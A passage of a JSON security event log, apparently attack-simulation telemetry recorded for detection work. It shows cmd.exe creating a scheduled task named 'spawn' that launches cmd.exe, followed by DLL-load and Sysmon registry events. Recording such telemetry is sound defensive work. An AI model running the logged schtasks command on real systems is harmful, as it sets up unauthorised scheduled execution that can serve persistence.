"process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573804750000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804790000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "command_line": "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", - "event_type": "process", 
- "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6308, - "ppid": 1776, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "create", - "timestamp": 131883573804840000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}", - "unique_ppid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - 
"event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "schtasks.exe", - "image_path": "C:\\Windows\\System32\\schtasks.exe", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - 
"image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": 
